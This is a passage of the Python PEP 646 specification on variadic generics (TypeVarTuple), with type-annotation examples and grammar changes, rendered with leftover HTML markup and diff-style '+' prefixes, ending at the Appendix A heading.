Note that in the previous example, the shape argument to __init__ +was annotated as Tuple[*Shape]. Why is this necessary - if Shape +behaves like Tuple[T1, T2, ...], couldn’t we have annotated the shape +argument as Shape directly?

+

This is, in fact, deliberately not possible: type variable tuples must +always be used unpacked (that is, prefixed by the star operator). This is +for two reasons:

+
  • To avoid potential confusion about whether to use a type variable tuple in a packed or unpacked form (“Hmm, should I write ‘-> Shape’, or ‘-> Tuple[Shape]’, or ‘-> Tuple[*Shape]’…?”)
  • To improve readability: the star also functions as an explicit visual indicator that the type variable tuple is not a normal type variable.
+
+

Unpack for Backwards Compatibility

+

Note that the use of the star operator in this context requires a grammar change, +and is therefore available only in new versions of Python. To enable use of type +variable tuples in older versions of Python, we introduce the Unpack type +operator that can be used in place of the star operator:

+
# Unpacking using the star operator in new versions of Python
+class Array(Generic[*Shape]): ...
+
+# Unpacking using ``Unpack`` in older versions of Python
+class Array(Generic[Unpack[Shape]]): ...
+
+
+
+
+

Variance, Type Constraints and Type Bounds: Not (Yet) Supported

+

To keep this PEP minimal, TypeVarTuple does not yet support specification of:

+
  • Variance (e.g. TypeVar('T', covariant=True))
  • Type constraints (TypeVar('T', int, float))
  • Type bounds (TypeVar('T', bound=ParentClass))

We leave the decision of how these arguments should behave to a future PEP, when variadic generics have been tested in the field. As of this PEP, type variable tuples are +invariant.

+
+
+

Type Variable Tuple Equality

+

If the same TypeVarTuple instance is used in multiple places in a signature +or class, a valid type inference might be to bind the TypeVarTuple to +a Tuple of a Union of types:

+
def foo(arg1: Tuple[*Ts], arg2: Tuple[*Ts]): ...
+
+a = (0,)
+b = ('0',)
+foo(a, b)  # Can Ts be bound to Tuple[int | str]?
+
+
+

We do not allow this; type unions may not appear within the Tuple. +If a type variable tuple appears in multiple places in a signature, +the types must match exactly (the list of type parameters must be the same +length, and the type parameters themselves must be identical):

+
def pointwise_multiply(
+    x: Array[*Shape],
+    y: Array[*Shape]
+) -> Array[*Shape]: ...
+
+x: Array[Height]
+y: Array[Width]
+z: Array[Height, Width]
+pointwise_multiply(x, x)  # Valid
+pointwise_multiply(x, y)  # Error
+pointwise_multiply(x, z)  # Error
+
+
+
+
+

Multiple Type Variable Tuples: Not Allowed

+

As of this PEP, only a single type variable tuple may appear in a type parameter list:

+
class Array(Generic[*Ts1, *Ts2]): ...  # Error
+
+
+

The reason is that multiple type variable tuples make it ambiguous +which parameters get bound to which type variable tuple:

+
x: Array[int, str, bool]  # Ts1 = ???, Ts2 = ???
+
+
+
+
+
+

Type Concatenation

+

Type variable tuples don’t have to be alone; normal types can be +prefixed and/or suffixed:

+
Shape = TypeVarTuple('Shape')
+Batch = NewType('Batch', int)
+Channels = NewType('Channels', int)
+
+def add_batch_axis(x: Array[*Shape]) -> Array[Batch, *Shape]: ...
+def del_batch_axis(x: Array[Batch, *Shape]) -> Array[*Shape]: ...
+def add_batch_channels(
+  x: Array[*Shape]
+) -> Array[Batch, *Shape, Channels]: ...
+
+a: Array[Height, Width]
+b = add_batch_axis(a)      # Inferred type is Array[Batch, Height, Width]
+c = del_batch_axis(b)      # Array[Height, Width]
+d = add_batch_channels(a)  # Array[Batch, Height, Width, Channels]
+
+
+

Normal TypeVar instances can also be prefixed and/or suffixed:

+
T = TypeVar('T')
+Ts = TypeVarTuple('Ts')
+
+def prefix_tuple(
+    x: T,
+    y: Tuple[*Ts]
+) -> Tuple[T, *Ts]: ...
+
+z = prefix_tuple(x=0, y=(True, 'a'))
+# Inferred type of z is Tuple[int, bool, str]
+
+
+
+
+

Unpacking Tuple Types

+

We mentioned that a TypeVarTuple stands for a tuple of types. +Since we can unpack a TypeVarTuple, for consistency, we also +allow unpacking a tuple type. As we shall see, this also enables a +number of interesting features.

+
+

Unpacking Concrete Tuple Types

+

Unpacking a concrete tuple type is analogous to unpacking a tuple of +values at runtime. Tuple[int, *Tuple[bool, bool], str] is +equivalent to Tuple[int, bool, bool, str].
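A brief sketch of this equivalence as a type checker would see it (using the Python 3.11 star syntax; the function name is illustrative):

from typing import Tuple

def f(x: Tuple[int, *Tuple[bool, bool], str]) -> None: ...

f((1, True, False, 'a'))  # OK: matches Tuple[int, bool, bool, str]
f((1, True, 'a'))         # Error: missing the second bool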

+
+
+

Unpacking Unbounded Tuple Types

+

Unpacking an unbounded tuple preserves the unbounded tuple as it is. +That is, *Tuple[int, ...] remains *Tuple[int, ...]; there’s no +simpler form. This enables us to specify types such as Tuple[int, +*Tuple[str, ...], str] - a tuple type where the first element is +guaranteed to be of type int, the last element is guaranteed to be +of type str, and the elements in the middle are zero or more +elements of type str. Note that Tuple[*Tuple[int, ...]] is +equivalent to Tuple[int, ...].

+

Unpacking unbounded tuples is also useful in function signatures where +we don’t care about the exact elements and don’t want to define an +unnecessary TypeVarTuple:

+
def process_batch_channels(
+    x: Array[Batch, *Tuple[Any, ...], Channels]
+) -> None:
+    ...
+
+
+x: Array[Batch, Height, Width, Channels]
+process_batch_channels(x)  # OK
+y: Array[Batch, Channels]
+process_batch_channels(y)  # OK
+z: Array[Batch]
+process_batch_channels(z)  # Error: Expected Channels.
+
+
+

We can also pass a *Tuple[int, ...] wherever a *Ts is +expected. This is useful when we have particularly dynamic code and +cannot state the precise number of dimensions or the precise types for +each of the dimensions. In those cases, we can smoothly fall back to +an unbounded tuple:

+
y: Array[*Tuple[Any, ...]] = read_from_file()
+
+def expect_variadic_array(
+    x: Array[Batch, *Shape]
+) -> None: ...
+
+expect_variadic_array(y)  # OK
+
+def expect_precise_array(
+    x: Array[Batch, Height, Width, Channels]
+) -> None: ...
+
+expect_precise_array(y)  # OK
+
+
+

Array[*Tuple[Any, ...]] stands for an array with an arbitrary +number of dimensions of type Any. This means that, in the call to +expect_variadic_array, Batch is bound to Any and Shape +is bound to Tuple[Any, ...]. In the call to +expect_precise_array, the variables Batch, Height, +Width, and Channels are all bound to Any.

+

This allows users to handle dynamic code gracefully while still +explicitly marking the code as unsafe (by using y: Array[*Tuple[Any, +...]]). Otherwise, users would face noisy errors from the type +checker every time they tried to use the variable y, which would +hinder them when migrating a legacy code base to use TypeVarTuple.

+
+
+

Multiple Unpackings in a Tuple: Not Allowed

+

As with TypeVarTuples, only one unpacking may appear in a tuple:

+
x: Tuple[int, *Ts, str, *Ts2]  # Error
+y: Tuple[int, *Tuple[int, ...], str, *Tuple[str, ...]]  # Error
+
+
+
+
+
+

*args as a Type Variable Tuple

+

PEP 484 states that when a type annotation is provided for *args, every argument +must be of the type annotated. That is, if we specify *args to be type int, +then all arguments must be of type int. This limits our ability to specify +the type signatures of functions that take heterogeneous argument types.

+

If *args is annotated as a type variable tuple, however, the types of the +individual arguments become the types in the type variable tuple:

+
Ts = TypeVarTuple('Ts')
+
+def args_to_tuple(*args: *Ts) -> Tuple[*Ts]: ...
+
+args_to_tuple(1, 'a')  # Inferred type is Tuple[int, str]
+
+
+

In the above example, Ts is bound to Tuple[int, str]. If no +arguments are passed, the type variable tuple behaves like an empty +tuple, Tuple[()].

+

As usual, we can unpack any tuple types. For example, by using a type +variable tuple inside a tuple of other types, we can refer to prefixes +or suffixes of the variadic argument list. For example:

+
# os.execle takes arguments 'path, arg0, arg1, ..., env'
+def execle(path: str, *args: *Tuple[*Ts, Env]) -> None: ...
+
+
+

Note that this is different to

+
def execle(path: str, *args: *Ts, env: Env) -> None: ...
+
+
+

as this would make env a keyword-only argument.

+

Using an unpacked unbounded tuple is equivalent to the +PEP 484 +behavior of *args: int, which accepts zero or +more values of type int:

+
def foo(*args: *Tuple[int, ...]) -> None: ...
+
+# equivalent to:
+def foo(*args: int) -> None: ...
+
+
+

Unpacking tuple types also allows more precise types for heterogeneous +*args. The following function expects an int at the beginning, +zero or more str values, and a str at the end:

+
def foo(*args: *Tuple[int, *Tuple[str, ...], str]) -> None: ...
+
+
+

For completeness, we mention that unpacking a concrete tuple allows us +to specify *args of a fixed number of heterogeneous types:

+
def foo(*args: *Tuple[int, str]) -> None: ...
+
+foo(1, "hello")  # OK
+
+
+

Note that, in keeping with the rule that type variable tuples must always +be used unpacked, annotating *args as being a plain type variable tuple +instance is not allowed:

+
def foo(*args: Ts): ...  # NOT valid
+
+
+

*args is the only case where an argument can be annotated as *Ts directly; +other arguments should use *Ts to parameterise something else, e.g. Tuple[*Ts]. +If *args itself is annotated as Tuple[*Ts], the old behaviour still applies: +all arguments must be a Tuple parameterised with the same types.

+
def foo(*args: Tuple[*Ts]): ...
+
+foo((0,), (1,))    # Valid
+foo((0,), (1, 2))  # Error
+foo((0,), ('1',))  # Error
+
+
+

Finally, note that a type variable tuple may not be used as the type of +**kwargs. (We do not yet know of a use case for this feature, so we prefer +to leave the ground fresh for a potential future PEP.)

+
# NOT valid
+def foo(**kwargs: *Ts): ...
+
+
+
+
+

Type Variable Tuples with Callable

+

Type variable tuples can also be used in the arguments section of a +Callable:

+
class Process:
+  def __init__(
+    self,
+    target: Callable[[*Ts], None],
+    args: Tuple[*Ts],
+  ) -> None: ...
+
+def func(arg1: int, arg2: str) -> None: ...
+
+Process(target=func, args=(0, 'foo'))  # Valid
+Process(target=func, args=('foo', 0))  # Error
+
+
+

Other types and normal type variables can also be prefixed/suffixed +to the type variable tuple:

+
T = TypeVar('T')
+
+def foo(f: Callable[[int, *Ts, T], Tuple[T, *Ts]]): ...
+
+
+

The behavior of a Callable containing an unpacked item, whether the +item is a TypeVarTuple or a tuple type, is to treat the elements +as if they were the type for *args. So, Callable[[*Ts], None] +is treated as the type of the function:

+
def foo(*args: *Ts) -> None: ...
+
+
+

Callable[[int, *Ts, T], Tuple[T, *Ts]] is treated as the type of +the function:

+
def foo(*args: *Tuple[int, *Ts, T]) -> Tuple[T, *Ts]: ...
+
+
+
+
+

Behaviour when Type Parameters are not Specified

+

When a generic class parameterised by a type variable tuple is used without +any type parameters, it behaves as if the type variable tuple was +substituted with Tuple[Any, ...]:

+
def takes_any_array(arr: Array): ...
+
+# equivalent to:
+def takes_any_array(arr: Array[*Tuple[Any, ...]]): ...
+
+x: Array[Height, Width]
+takes_any_array(x)  # Valid
+y: Array[Time, Height, Width]
+takes_any_array(y)  # Also valid
+
+
+

This enables gradual typing: existing functions accepting, for example, +a plain TensorFlow Tensor will still be valid even if Tensor is made +generic and calling code passes a Tensor[Height, Width].

+

This also works in the opposite direction:

+
def takes_specific_array(arr: Array[Height, Width]): ...
+
+z: Array
+# equivalent to Array[*Tuple[Any, ...]]
+
+takes_specific_array(z)
+
+
+

(For details, see the section on Unpacking Unbounded Tuple Types.)

+

This way, even if libraries are updated to use types like Array[Height, Width], +users of those libraries won’t be forced to also apply type annotations to +all of their code; users still have a choice about what parts of their code +to type and which parts to not.

+
+
+

Aliases

+

Generic aliases can be created using a type variable tuple in +a similar way to regular type variables:

+
IntTuple = Tuple[int, *Ts]
+NamedArray = Tuple[str, Array[*Ts]]
+
+IntTuple[float, bool]  # Equivalent to Tuple[int, float, bool]
+NamedArray[Height]     # Equivalent to Tuple[str, Array[Height]]
+
+
+

As this example shows, all type parameters passed to the alias are +bound to the type variable tuple.

+

Importantly for our original Array example (see Summary Examples), this +allows us to define convenience aliases for arrays of a fixed shape +or datatype:

+
Shape = TypeVarTuple('Shape')
+DType = TypeVar('DType')
+class Array(Generic[DType, *Shape]):
+
+# E.g. Float32Array[Height, Width, Channels]
+Float32Array = Array[np.float32, *Shape]
+
+# E.g. Array1D[np.uint8]
+Array1D = Array[DType, Any]
+
+
+

If an explicitly empty type parameter list is given, the type variable +tuple in the alias is set empty:

+
IntTuple[()]    # Equivalent to Tuple[int]
+NamedArray[()]  # Equivalent to Tuple[str, Array[()]]
+
+
+

If the type parameter list is omitted entirely, the unspecified type +variable tuples are treated as Tuple[Any, ...] (similar to +Behaviour when Type Parameters are not Specified):

+
def takes_float_array_of_any_shape(x: Float32Array): ...
+x: Float32Array[Height, Width] = Array()
+takes_float_array_of_any_shape(x)  # Valid
+
+def takes_float_array_with_specific_shape(
+    y: Float32Array[Height, Width]
+): ...
+y: Float32Array = Array()
+takes_float_array_with_specific_shape(y)  # Valid
+
+
+

Normal TypeVar instances can also be used in such aliases:

+
T = TypeVar('T')
+Foo = Tuple[T, *Ts]
+
+# T bound to str, Ts to Tuple[int]
+Foo[str, int]
+# T bound to float, Ts to Tuple[()]
+Foo[float]
+# T bound to Any, Ts to Tuple[Any, ...]
+Foo
+
+
+
+
+

Substitution in Aliases

+

In the previous section, we only discussed simple usage of generic aliases +in which the type arguments were just simple types. However, a number of +more exotic constructions are also possible.

+
+

Type Arguments can be Variadic

+

First, type arguments to generic aliases can be variadic. For example, a +TypeVarTuple can be used as a type argument:

+
Ts1 = TypeVarTuple('Ts1')
+Ts2 = TypeVarTuple('Ts2')
+
+IntTuple = Tuple[int, *Ts1]
+IntFloatTuple = IntTuple[float, *Ts2]  # Valid
+
+
+

Here, *Ts1 in the IntTuple alias is bound to Tuple[float, *Ts2], +resulting in an alias IntFloatTuple equivalent to +Tuple[int, float, *Ts2].

+

Unpacked arbitrary-length tuples can also be used as type arguments, with +similar effects:

+
IntFloatsTuple = IntTuple[*Tuple[float, ...]]  # Valid
+
+
+

Here, *Ts1 is bound to *Tuple[float, ...], resulting in +IntFloatsTuple being equivalent to Tuple[int, *Tuple[float, ...]]: a tuple +consisting of an int then zero or more floats.

+
+
+

Variadic Arguments Require Variadic Aliases

+

Variadic type arguments can only be used with generic aliases that are +themselves variadic. For example:

+
T = TypeVar('T')
+
+IntTuple = Tuple[int, T]
+
+IntTuple[str]                 # Valid
+IntTuple[*Ts]                 # NOT valid
+IntTuple[*Tuple[float, ...]]  # NOT valid
+
+
+

Here, IntTuple is a non-variadic generic alias that takes exactly one +type argument. Hence, it cannot accept *Ts or *Tuple[float, ...] as type +arguments, because they represent an arbitrary number of types.

+
+
+

Aliases with Both TypeVars and TypeVarTuples

+

In Aliases, we briefly mentioned that aliases can be generic in both +TypeVars and TypeVarTuples:

+
T = TypeVar('T')
+Foo = Tuple[T, *Ts]
+
+Foo[str, int]         # T bound to str, Ts to Tuple[int]
+Foo[str, int, float]  # T bound to str, Ts to Tuple[int, float]
+
+
+

In accordance with Multiple Type Variable Tuples: Not Allowed, at most one +TypeVarTuple may appear in the type parameters to an alias. However, a +TypeVarTuple can be combined with an arbitrary number of TypeVars, +both before and after:

+
T1 = TypeVar('T1')
+T2 = TypeVar('T2')
+T3 = TypeVar('T3')
+
+Tuple[*Ts, T1, T2]      # Valid
+Tuple[T1, T2, *Ts]      # Valid
+Tuple[T1, *Ts, T2, T3]  # Valid
+
+
+

In order to substitute these type variables with supplied type arguments, +any type variables at the beginning or end of the type parameter list first +consume type arguments, and then any remaining type arguments are bound +to the TypeVarTuple:

+
Shrubbery = Tuple[*Ts, T1, T2]
+
+Shrubbery[str, bool]              # T2=bool,  T1=str,   Ts=Tuple[()]
+Shrubbery[str, bool, float]       # T2=float, T1=bool,  Ts=Tuple[str]
+Shrubbery[str, bool, float, int]  # T2=int,   T1=float, Ts=Tuple[str, bool]
+
+Ptang = Tuple[T1, *Ts, T2, T3]
+
+Ptang[str, bool, float]       # T1=str, T3=float, T2=bool,  Ts=Tuple[()]
+Ptang[str, bool, float, int]  # T1=str, T3=int,   T2=float, Ts=Tuple[bool]
+
+
+

Note that the minimum number of type arguments in such cases is set by +the number of TypeVars:

+
Shrubbery[int]  # Not valid; Shrubbery needs at least two type arguments
+
+
+
+
+

Splitting Arbitrary-Length Tuples

+

A final complication occurs when an unpacked arbitrary-length tuple is used +as a type argument to an alias consisting of both TypeVars and a +TypeVarTuple:

+
Elderberries = Tuple[*Ts, T1]
+Hamster = Elderberries[*Tuple[int, ...]]  # valid
+
+
+

In such cases, the arbitrary-length tuple is split between the TypeVars +and the TypeVarTuple. We assume the arbitrary-length tuple contains +at least as many items as there are TypeVars, such that individual +instances of the inner type - here int - are bound to any TypeVars +present. The ‘rest’ of the arbitrary-length tuple - here *Tuple[int, ...], +since a tuple of arbitrary length minus two items is still arbitrary-length - +is bound to the TypeVarTuple.

+

Here, therefore, Hamster is equivalent to Tuple[*Tuple[int, ...], int]: +a tuple consisting of zero or more ints, then a final int.

+

Of course, such splitting only occurs if necessary. For example, if we instead +did:

+
Elderberries[*Tuple[int, ...], str]
+
+
+

Then splitting would not occur; T1 would be bound to str, and +Ts to *Tuple[int, ...].

+

In particularly awkward cases, a TypeVarTuple may consume both a type +and a part of an arbitrary-length tuple type:

+
Elderberries[str, *Tuple[int, ...]]
+
+
+

Here, T1 is bound to int, and Ts is bound to +Tuple[str, *Tuple[int, ...]]. This expression is therefore equivalent to +Tuple[str, *Tuple[int, ...], int]: a tuple consisting of a str, then +zero or more ints, ending with an int.

+
+
+

TypeVarTuples Cannot be Split

+

Finally, although any arbitrary-length tuples in the type argument list can be +split between the type variables and the type variable tuple, the same is not +true of TypeVarTuples in the argument list:

+
Ts1 = TypeVarTuple('Ts1')
+Ts2 = TypeVarTuple('Ts2')
+
+Camelot = Tuple[T, *Ts1]
+Camelot[*Ts2]  # NOT valid
+
+
+

This is not possible because, unlike in the case of an unpacked arbitrary-length +tuple, there is no way to ‘peer inside’ the TypeVarTuple to see what its +individual types are.

+
+
+
+

Overloads for Accessing Individual Types

+

For situations where we require access to each individual type in the type variable tuple, +overloads can be used with individual TypeVar instances in place of the type variable tuple:

+
Shape = TypeVarTuple('Shape')
+Axis1 = TypeVar('Axis1')
+Axis2 = TypeVar('Axis2')
+Axis3 = TypeVar('Axis3')
+
+class Array(Generic[*Shape]):
+
+  @overload
+  def transpose(
+    self: Array[Axis1, Axis2]
+  ) -> Array[Axis2, Axis1]: ...
+
+  @overload
+  def transpose(
+    self: Array[Axis1, Axis2, Axis3]
+  ) -> Array[Axis3, Axis2, Axis1]: ...
+
+
+

(For array shape operations in particular, having to specify +overloads for each possible rank is, of course, a rather cumbersome +solution. However, it’s the best we can do without additional type +manipulation mechanisms. We plan to introduce these in a future PEP.)

+
+
+
+

Rationale and Rejected Ideas

+
+

Shape Arithmetic

+

Considering the use case of array shapes in particular, note that as of +this PEP, it is not yet possible to describe arithmetic transformations +of array dimensions - for example, +def repeat_each_element(x: Array[N]) -> Array[2*N]. We consider +this out-of-scope for the current PEP, but plan to propose additional +mechanisms that will enable this in a future PEP.

+
+
+

Supporting Variadicity Through Aliases

+

As noted in the introduction, it is possible to avoid variadic generics +by simply defining aliases for each possible number of type parameters:

+
class Array1(Generic[Axis1]): ...
+class Array2(Generic[Axis1, Axis2]): ...
+
+
+

However, this seems somewhat clumsy - it requires users to unnecessarily +pepper their code with 1s, 2s, and so on for each rank necessary.

+
+
+

Construction of TypeVarTuple

+

TypeVarTuple began as ListVariadic, based on its naming in +an early implementation in Pyre.

+

We then changed this to TypeVar(list=True), on the basis that a) +it better emphasises the similarity to TypeVar, and b) the meaning +of ‘list’ is more easily understood than the jargon of ‘variadic’.

+

Once we’d decided that a variadic type variable should behave like a Tuple, we also considered TypeVar(bound=Tuple), which is similarly intuitive and accomplishes most of what we wanted without requiring any new arguments to TypeVar. However, we realised this may constrain us in the future, if for example we want type bounds or variance to function slightly differently for variadic type variables than what the semantics of TypeVar might otherwise imply. Also, we may later wish to support arguments that should not be supported by regular type variables (such as arbitrary_len [10]).

+

We therefore settled on TypeVarTuple.

+
+
+

Unspecified Type Parameters: Tuple vs TypeVarTuple

+

In order to support gradual typing, this PEP states that both +of the following examples should type-check correctly:

+
def takes_any_array(x: Array): ...
+x: Array[Height, Width]
+takes_any_array(x)
+
+def takes_specific_array(y: Array[Height, Width]): ...
+y: Array
+takes_specific_array(y)
+
+
+

Note that this is in contrast to the behaviour of the only currently-existing +variadic type in Python, Tuple:

+
def takes_any_tuple(x: Tuple): ...
+x: Tuple[int, str]
+takes_any_tuple(x)  # Valid
+
+def takes_specific_tuple(y: Tuple[int, str]): ...
+y: Tuple
+takes_specific_tuple(y)  # Error
+
+
+

The rules for Tuple were deliberately chosen such that the latter case +is an error: it was thought to be more likely that the programmer has made a +mistake than that the function expects a specific kind of Tuple but the +specific kind of Tuple passed is unknown to the type checker. Additionally, +Tuple is something of a special case, in that it is used to represent +immutable sequences. That is, if an object’s type is inferred to be an +unparameterised Tuple, it is not necessarily because of incomplete typing.

+

In contrast, if an object’s type is inferred to be an unparameterised Array, +it is much more likely that the user has simply not yet fully annotated their +code, or that the signature of a shape-manipulating library function cannot yet +be expressed using the typing system and therefore returning a plain Array +is the only option. We rarely deal with arrays of truly arbitrary shape; +in certain cases, some parts of the shape will be arbitrary - for example, +when dealing with sequences, the first two parts of the shape are often +‘batch’ and ‘time’ - but we plan to support these cases explicitly in a +future PEP with a syntax such as Array[Batch, Time, ...].

+

We therefore made the decision to have variadic generics other than +Tuple behave differently, in order to give the user more flexibility +in how much of their code they wish to annotate, and to enable compatibility +between old unannotated code and new versions of libraries which do use +these type annotations.

+
+
+
+

Alternatives

+

It should be noted that the approach outlined in this PEP to solve the +issue of shape checking in numerical libraries is not the only approach +possible. Examples of lighter-weight alternatives based on runtime checking include +ShapeGuard [13], tsanley [11], and PyContracts [12].

+

While these existing approaches improve significantly on the default +situation of shape checking only being possible through lengthy and verbose +assert statements, none of them enable static analysis of shape correctness. +As mentioned in Motivation, this is particularly desirable for +machine learning applications where, due to library and infrastructure complexity, +even relatively simple programs must suffer long startup times; iterating +by running the program until it crashes, as is necessary with these +existing runtime-based approaches, can be a tedious and frustrating +experience.

+

Our hope with this PEP is to begin to codify generic type annotations as +an official, language-supported way of dealing with shape correctness. +With something of a standard in place, in the long run, this will +hopefully enable a thriving ecosystem of tools for analysing and verifying +shape properties of numerical computing programs.

+
+
+

Grammar Changes

+

This PEP requires two grammar changes.

+
+

Change 1: Star Expressions in Indexes

+

The first grammar change enables use of star expressions in index operations (that is, +within square brackets), necessary to support star-unpacking of TypeVarTuples:

+
DType = TypeVar('DType')
+Shape = TypeVarTuple('Shape')
+class Array(Generic[DType, *Shape]):
+    ...
+
+
+

Before:

+
slices:
+    | slice !','
+    | ','.slice+ [',']
+
+
+

After:

+
slices:
+    | slice !','
+    | ','.(slice | starred_expression)+ [',']
+
+
+

As with star-unpacking in other contexts, the star operator calls __iter__ on the object being unpacked, and adds the contents of the resulting iterator to the argument passed to __getitem__. For example, if we do foo[a, *b, c], and b.__iter__ produces an iterator yielding d and e, foo.__getitem__ would receive (a, d, e, c).

+

To put it another way, note that x[..., *a, ...] produces the same result +as x[(..., *a, ...)] (with any slices i:j in ... replaced with +slice(i, j), with the one edge case that x[*a] becomes x[(*a,)]).
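The following runnable sketch illustrates this behaviour, assuming an interpreter that includes this grammar change (Python 3.11+); Probe is a stand-in class defined only for the demonstration:

class Probe:
    def __getitem__(self, item):
        # Echo back exactly what __getitem__ receives.
        return item

p = Probe()
idxs = (1, 2)
assert p[0, *idxs, 3] == (0, 1, 2, 3)
assert p[*idxs] == (1, 2)  # x[*a] becomes x[(*a,)]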

+
+

TypeVarTuple Implementation

+

With this grammar change, TypeVarTuple is implemented as follows. +Note that this implementation is useful only for the benefit of a) correct +repr() and b) runtime analysers; static analysers would not use the +implementation.

+
class TypeVarTuple:
+    def __init__(self, name):
+        self._name = name
+        self._unpacked = UnpackedTypeVarTuple(name)
+    def __iter__(self):
+        yield self._unpacked
+    def __repr__(self):
+        return self._name
+
+class UnpackedTypeVarTuple:
+    def __init__(self, name):
+        self._name = name
+    def __repr__(self):
+        return '*' + self._name
+
+
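A quick runtime check of this sketch (purely illustrative, using the two classes just defined):

Ts = TypeVarTuple('Ts')
assert repr(Ts) == 'Ts'
unpacked, = Ts                  # __iter__ yields the single UnpackedTypeVarTuple
assert repr(unpacked) == '*Ts'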
+
+
+

Implications

+

This grammar change implies a number of additional changes in behaviour not +required by this PEP. We choose to allow these additional changes rather than +disallowing them at a syntax level in order to keep the syntax change as small +as possible.

+

First, the grammar change enables star-unpacking of other structures, such +as lists, within indexing operations:

+
idxs = (1, 2)
+array_slice = array[0, *idxs, -1]  # Equivalent to [0, 1, 2, -1]
+array[0, *idxs, -1] = array_slice  # Also allowed
+
+
+

Second, more than one instance of a star-unpack can occur within an index:

+
array[*idxs_to_select, *idxs_to_select]  # Equivalent to array[1, 2, 1, 2]
+
+
+

Note that this PEP disallows multiple unpacked TypeVarTuples within a single +type parameter list. This requirement would therefore need to be implemented +in type checking tools themselves rather than at the syntax level.

+

Third, slices may co-occur with starred expressions:

+
array[3:5, *idxs_to_select]  # Equivalent to array[3:5, 1, 2]
+
+
+

However, note that slices involving starred expressions are still invalid:

+
# Syntax error
+array[*idxs_start:*idxs_end]
+
+
+
+
+
+

Change 2: *args as a TypeVarTuple

+

The second change enables use of *args: *Ts in function definitions.

+

Before:

+
star_etc:
+| '*' param_no_default param_maybe_default* [kwds]
+| '*' ',' param_maybe_default+ [kwds]
+| kwds
+
+
+

After:

+
star_etc:
+| '*' param_no_default param_maybe_default* [kwds]
+| '*' param_no_default_star_annotation param_maybe_default* [kwds]  # New
+| '*' ',' param_maybe_default+ [kwds]
+| kwds
+
+
+

Where:

+
param_no_default_star_annotation:
+| param_star_annotation ',' TYPE_COMMENT?
+| param_star_annotation TYPE_COMMENT? &')'
+
+param_star_annotation: NAME star_annotation
+
+star_annotation: ':' star_expression
+
+
+

We also need to deal with the star_expression that results from this +construction. Normally, a star_expression occurs within the context +of e.g. a list, so a star_expression is handled by essentially +calling iter() on the starred object, and inserting the results +of the resulting iterator into the list at the appropriate place. For +*args: *Ts, however, we must process the star_expression in a +different way.

+

We do this by instead making a special case for the star_expression +resulting from *args: *Ts, emitting code equivalent to +[annotation_value] = [*Ts]. That is, we create an iterator from +Ts by calling Ts.__iter__, fetch a single value from the iterator, +verify that the iterator is exhausted, and set that value as the annotation +value. This results in the unpacked TypeVarTuple being set directly +as the runtime annotation for *args:

+
>>> Ts = TypeVarTuple('Ts')
+>>> def foo(*args: *Ts): pass
+>>> foo.__annotations__
+{'args': *Ts}
+# *Ts is the repr() of Ts._unpacked, an instance of UnpackedTypeVarTuple
+
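In terms of the minimal TypeVarTuple implementation sketched earlier, the emitted code therefore behaves like this illustrative snippet:

Ts = TypeVarTuple('Ts')
[annotation_value] = [*Ts]      # calls Ts.__iter__ and requires exactly one element
assert repr(annotation_value) == '*Ts'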
+
+

This allows the runtime annotation to be consistent with an AST representation +that uses a Starred node for the annotations of args - in turn important +for tools that rely on the AST such as mypy to correctly recognise the construction:

+
>>> print(ast.dump(ast.parse('def foo(*args: *Ts): pass'), indent=2))
+Module(
+  body=[
+    FunctionDef(
+      name='foo',
+      args=arguments(
+        posonlyargs=[],
+        args=[],
+        vararg=arg(
+          arg='args',
+          annotation=Starred(
+            value=Name(id='Ts', ctx=Load()),
+            ctx=Load())),
+        kwonlyargs=[],
+        kw_defaults=[],
+        defaults=[]),
+      body=[
+        Pass()],
+      decorator_list=[])],
+  type_ignores=[])
+
+
+

Note that the only scenario in which this grammar change allows *Ts to be +used as a direct annotation (rather than being wrapped in e.g. Tuple[*Ts]) +is *args. Other uses are still invalid:

+
x: *Ts                 # Syntax error
+def foo(x: *Ts): pass  # Syntax error
+
+
+
+

Implications

+

As with the first grammar change, this change also has a number of side effects. +In particular, the annotation of *args could be set to a starred object +other than a TypeVarTuple - for example, the following nonsensical +annotations are possible:

+
>>> foo = [1]
+>>> def bar(*args: *foo): pass
+>>> bar.__annotations__
+{'args': 1}
+
+>>> foo = [1, 2]
+>>> def bar(*args: *foo): pass
+ValueError: too many values to unpack (expected 1)
+
+
+

Again, prevention of such annotations will need to be done by, say, static +checkers, rather than at the level of syntax.

+
+
+
+

Alternatives (Why Not Just Use Unpack?)

+

If these grammar changes are considered too burdensome, there are two +alternatives.

+

The first would be to support change 1 but not change 2. Variadic generics +are more important to us than the ability to annotate *args.

+

The second alternative would be to use Unpack instead, requiring no +grammar changes. However, we regard this as a suboptimal solution for two +reasons:

+
    +
  • Readability. class Array(Generic[DType, Unpack[Shape]]) is a bit +of a mouthful; the flow of reading is interrupted by the length of Unpack and +the extra set of square brackets. class Array(Generic[DType, *Shape]) +is much easier to skim, while still marking Shape as special.
  • +
  • Intuitiveness. We think a user is more likely to intuitively understand +the meaning of *Ts - especially when they see that Ts is a +TypeVarTuple - than the meaning of Unpack[Ts]. (This assumes +the user is familiar with star-unpacking in other contexts; if the +user is reading or writing code that uses variadic generics, this seems +reasonable.)
  • +
+

If even change 1 is thought too significant a change, it might therefore be +better for us to reconsider our options before going ahead with this second +alternative.

+
+
+
+

Backwards Compatibility

+

The Unpack version of the PEP should be back-portable to previous +versions of Python.

+

Gradual typing is enabled by the fact that unparameterised variadic classes +are compatible with an arbitrary number of type parameters. This means +that if existing classes are made generic, a) all existing (unparameterised) +uses of the class will still work, and b) parameterised and unparameterised +versions of the class can be used together (relevant if, for example, library +code is updated to use parameters while user code is not, or vice-versa).

+
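For example, here is a sketch of that compatibility (the Array, Batch and Time classes are ours for illustration; the ‘OK’ verdicts in the comments assume a type checker implementing this PEP, and the * syntax requires Python 3.11+):

from typing import Generic, TypeVar, TypeVarTuple

DType = TypeVar('DType')
Shape = TypeVarTuple('Shape')

class Batch: ...
class Time: ...

class Array(Generic[DType, *Shape]): ...

def new_library_fn(x: Array[float, Batch, Time]) -> None: ...
def old_user_fn(x: Array) -> None: ...

def caller(new_style: Array[float, Batch, Time], old_style: Array) -> None:
    new_library_fn(old_style)  # OK: unparameterised Array accepts any parameterisation
    old_user_fn(new_style)     # OK: a parameterised Array is still an Array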
+
+

Reference Implementation

+

Two reference implementations of type-checking functionality exist: +one in Pyre, as of v0.9.0, and one in Pyright, as of v1.1.108.

+

A preliminary implementation of the Unpack version of the PEP in CPython +is available in cpython/23527. A preliminary version of the version +using the star operator, based on an early implementation of PEP 637, +is also available at mrahtz/cpython/pep637+646.

+
+
+

Appendix A: Shape Typing Use Cases

+

